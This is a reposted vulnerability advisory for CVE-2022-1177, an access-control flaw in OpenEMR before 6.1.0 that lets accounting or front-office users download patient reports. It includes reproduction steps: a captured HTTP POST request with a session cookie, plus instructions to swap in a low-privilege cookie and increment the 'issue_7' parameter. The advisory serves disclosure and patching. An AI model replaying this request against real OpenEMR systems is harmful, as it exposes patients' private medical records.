Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-1177: Accounting User Can Download Patient Reports in openemr in openemr

Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.

CVE
Open in Source
#vulnerability#web#windows#git

Vulnerability Type

Insecure Direct Object Reference

Affected URL

https://localhost/openemr/interface/patient_file/report/custom_report.php

Affected Parameters

“Issue_7”

Authentication Required?

Yes

Issue Summary

Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.

Recommendation

Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.

Credits

Aden Yap Chuen Zhen ([email protected]) Rizan, Sheikh ([email protected]) Ali Radzali
([email protected])

Issue Reproduction

Login to OpenEMR as Admin and capture the POST request to the following end-point:

https://localhost/openemr/interface/patient_file/report/custom_report.php

In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue_7” can be tampered.

Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
 
Upgrade-Insecure-Requests: 1
 
include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F

Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue_7” parameter to any valid number eg “issue_7=/15/” to access patient documents.

References

  • This bug was already reported and fix by Openemr project team. Kindly reach out to Brad in case of questions. Details of patch at: https://www.open-emr.org/wiki/index.php/OpenEMR_Patches

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE